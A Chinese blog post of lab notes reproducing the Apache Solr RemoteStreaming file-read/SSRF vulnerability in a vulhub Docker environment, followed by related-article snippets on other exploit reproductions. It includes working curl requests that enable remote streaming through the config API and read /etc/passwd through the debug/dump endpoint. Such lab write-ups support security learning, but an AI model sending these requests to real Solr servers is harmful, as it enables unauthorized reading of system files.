vulhub漏洞—Apache_Solr_RemoteStreaming文件读取与SSRF漏洞

最新推荐文章于 2024-02-03 20:11:34 发布
最新推荐文章于 2024-02-03 20:11:34 发布
阅读量355 收藏
点赞数
分类专栏: 网络安全 学习笔记 vulhub 文章标签: solr apache lucene
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45808483/article/details/121996631
版权
学习笔记 同时被 3 个专栏收录
38 篇文章 8 订阅
订阅专栏
网络安全
33 篇文章 7 订阅
订阅专栏
vulhub
12 篇文章 1 订阅
订阅专栏

漏洞描述

Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。

影响范围

Apache Solr <= 8.8.1

复现过程

漏洞环境

vulhub搭建:https://github.com/vulhub/vulhub/blob/master/solr/Remote-Streaming-Fileread/README.zh-cn.md

执行如下命令启动solr 8.8.1:

docker-compose up -d

环境启动后,访问http://your-ip:8983即可查看Apache Solr后台。

复现过程

image-20211217144348178

访问,获取core

http://ip:8983/solr/admin/cores?indexInfo=false&wt=json

image-20211217144835223

我们这里core为demo,命令行发送

发送如下数据包,修改数据库demo的配置,开启RemoteStreaming:

curl -i -s -k -X $'POST' \ -H $'Content-Type: application/json'

--data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}} \

$'http://ip:8983/solr/demo/config'

image-20211217145016779

读取任意文件

curl -i -s -k 'http://ip:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'

image-20211217145546857

ErYao7
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Apache Solr RemoteStreaming 文件读取SSRF漏洞
m0_48520508的博客
04-28 566
0x00简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果. 0x01漏洞概述 Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取. 0x02影响范围 Apache Solr <= 8.8.1均受
CVE-2021-43008 vulhub 环境利用复现
最新发布
ldl345的博客
06-07 316
LOAD DATA INFILE作用是可以把文件读入到数据库的某个表里,如果在远程连接状态下使用了LOCAL关键字,即LOAD DATE LOCAL INFILE,那么就会快速读取本地文件到数据库,又因为攻击者已经操控了这个数据库,所以先读取本地文件到数据库,再在第四步中对数据库文件进行查看。1.为了应用此漏洞,攻击者需求拜访 Adminer 的登录页面并操控的 MySQL 数据库:就是说攻击者已经得到了这个数据的账号和密码,能够用Adminer远程连接。这个工具,我直接下载的gui的jar版本。
Apache Solr任意文件读取SSRF漏洞的自动化挖掘
weixin_40418457的博客
03-18 670
漏洞描述 Apache Solr是一个开源的搜索服务,使用Java语言开发。Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞。 综上,存在两个漏洞:任意文件读取SSRF,同时SSRF也可以导致任意文件读取漏洞详情 两个漏洞在同一个HTTP请求中触发,分别对应不同的参数,触发漏洞的url为http://x.x.x.x:8983/solr/new_core/debug/dump?stream.
漏洞复现----20、Apache Solr RemoteStreaming 任意文件读取SSRF
七天
10-12 586
文章目录一、Apache Solr简介二、内容流与RemoteStreaming1、内容流2、RemoteStreaming三、漏洞复现1、访问到Apache Solr的管理控制台 一、Apache Solr简介 Apache Solr是一个功能强大的开源搜索服务器,它支持REST风格API。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。 影响版本:Apache Solr <= 8.8.1 1、下载地址: https://so
Apache Solr RemoteStreaming 文件读取SSRF漏洞CVE-2021-27905)
黑白的博客
05-11 1373
声明 好好学习,天天向上 漏洞描述 Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。 影响范围 Apache Solr <= 8.8.1(全版本) 复现过程 这里使用8.1.1版本 使用vulhub /app/vulhub/vulhub-master/shiro/CVE-2020-1957 使用docker启动 docker-compose build docker-compose u
apache-solr-dataimportscheduler-1.0.zip_official54l_solr 5.x定时生成
09-24
这个压缩包中的主要文件"apache-solr-dataimportscheduler-1.0.jar"包含了实现这一功能所需的全部Java类和资源。 在Solr中,数据导入通常通过DataImportHandler (DIH) 完成,DIH是一个插件,负责从外部数据源(如...
Apache Solr最新版任意文件读取0day1
08-03
Apache Solr 是一个流行的开源全文搜索引擎,...总之,Apache Solr的任意文件读取漏洞是值得注意的安全问题,尤其是在默认配置下运行的系统。为了系统的安全性,管理员应该实施严格的访问控制策略,并保持软件的更新。
sss.rar_solr_solr search
09-23
1. **全文搜索**:Solr支持对文本的全文检索,能够找出与搜索词相关的文档。 2. ** faceted search**(分面搜索):允许用户根据分类或属性进行筛选,提高搜索精度。 3. **高亮显示**:在搜索结果中突出显示匹配的...
apache-solr-1.4.0.zip_apache-solr _apache-solr-1.4.0_apache-solr
09-20
Apache Solr 是一个开源的企业级搜索平台,由Apache软件基金会开发。它基于Java,并且是Lucene库的一个高级封装,提供了更加便捷和可扩展的全文检索、数据分析和搜索功能。在1.4.0版本中,Solr已经相当成熟,为用户...
Apache Solr 任意文件读取.py
06-07
Apache Solr RemoteStreaming 任意文件读取SSRF
Apache Solr RemoteStreaming 任意文件读取
Li-D的博客
06-07 376
漏洞描述 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 Apache Solr是一个开源搜索服务引擎,攻击者可以在未授权的情况下构造恶意HTTP请求读取目标Apache Solr服务器的任意文件。 影响版本 Apache Solr <= 8.8.1 环境搭建 开启docker-compose环
vulhub-Solr
Mccc_li的博客
08-09 280
文章目录Apache Solr 远程命令执行漏洞CVE-2017-12629)使用postCommit测试使用newSearcher测试Apache solr XML 实体注入漏洞CVE-2017-12629) Apache Solr 远程命令执行漏洞CVE-2017-12629) 使用postCommit测试 1.第一次命令执行我们需要创建一个listener GET /solr/demo/config HTTP/1.1 Host: 192.168.100.129:8983 User-Agent:
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)
qq_51577576的博客
03-13 940
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268) 在ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞。 ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像(例如,调整大小)时,生成的图像可能嵌入了任意远程文件的内容(如果ImageMagick二进制文件有权读取它)。
vulhub漏洞复现-Apache Flink(CVE-2020-17518 CVE-2020-17519)任意文件上传/读取
遇事不决冲冲冲
11-01 3713
Apache Flink Apache Flink 是一个分布式系统,它需要计算资源来执行应用程序。Flink 集成了所有常见的集群资源管理器,例如 Hadoop YARN、 Apache Mesos 和 Kubernetes,但同时也可以作为独立集群运行。 CVE-2020-17518 思路 Apache Flink 控制面板的Submit New Job处存在任意文件上传,利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置 漏洞复现 上传后抓包 进入后台查看 CV
vulhub漏洞复现64_Solr
weixin_44193247的博客
02-12 689
vulhub漏洞复现练习篇
[ vulhub漏洞复现篇 ] solr 远程命令执行(CVE-2019-0193)
qq_51577576的博客
12-08 565
[ vulhub漏洞复现篇 ] solr 远程命令执行(CVE-2019-0193) 此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。
Apache HTTP Server SSRF漏洞CVE-2021-40438)复现(vulhub
qq_51398553的博客
06-21 1697
在反向代理模式下,客户端不知道真正的服务器是谁,只是向代理服务器发送请求,代理服务器再根据自己的策略将请求转发到目标服务器,目标服务器返回数据给代理服务器,代理服务器再将数据返回给客户端。2.在unix:与|之间输入的长度大概是4092个字符(多于4092个字符可以,少于也可以,但不能少于一定的字符,上面的是不能4069个字符,其他的没有实验,有知道的可以告诉我一下原因哈),即可构造出uds_path为null,让Apache不再发送请求给unix套接字。,拉取镜像,并查看服务相关信息。
vulhub中Adminer远程文件读取漏洞复现(CVE-2021-43008
yougexiaojiuguan的博客
02-03 1197
漏洞复现过程的记录,也是为了方便自己查看
"Apache Solr 组件安全概览:历史漏洞分析与防御建议
最后,本文提出了一个全版本任意文件读取漏洞的案例,该漏洞已被作者发现并报告给Apache Solr官方,但官方拒绝修复该漏洞。因此,本文呼吁用户谨慎处理这一漏洞,建议采取相应的安全措施和风险管理措施,以确保系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ErYao7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值